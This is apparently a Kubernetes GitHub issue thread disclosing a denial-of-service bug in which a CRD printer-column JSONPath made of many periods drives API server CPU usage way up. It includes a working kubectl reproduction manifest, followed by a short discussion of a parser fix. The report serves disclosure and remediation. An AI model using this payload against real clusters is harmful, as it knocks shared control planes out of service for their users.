### ISSUE TITLE
Exponential entity expansion allowed by jsonpath function 

### ISSUE THREAD

**Issue by joelsmith** [kubernetes/kubernetes#93400]
**What happened**:

This issue was originally reported via the Kubernetes HackerOne bug bounty by HackerOne user [lazydog](https://hackerone.com/lazydog) but we have decided that due to the high privileges required, it can be addressed publicly.

A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.

**What you expected to happen**:

The `jsonpath` function should not expand strings with more than two consecutive periods. Either it should collapse additional repeated periods or it should return an error.

**How to reproduce it (as minimally and precisely as possible)**:
```
$ kubectl create -f - <<EOF
---
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF

$ kubectl create -f - <<EOF
---
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF

$ kubectl get foo
# ( and the API server CPU usage jumps way up )
```

/kind bug
/area apiserver
/area security
/committee product-security
/priority important-longterm

**Comment by knight42** [comment]
@joelsmith How about we take it a step further by rejecting the jsonpath which contains `...` when parsing it?

**Comment by joelsmith** [comment]
@knight42 good idea. I have posted #93408 to do what you suggest.
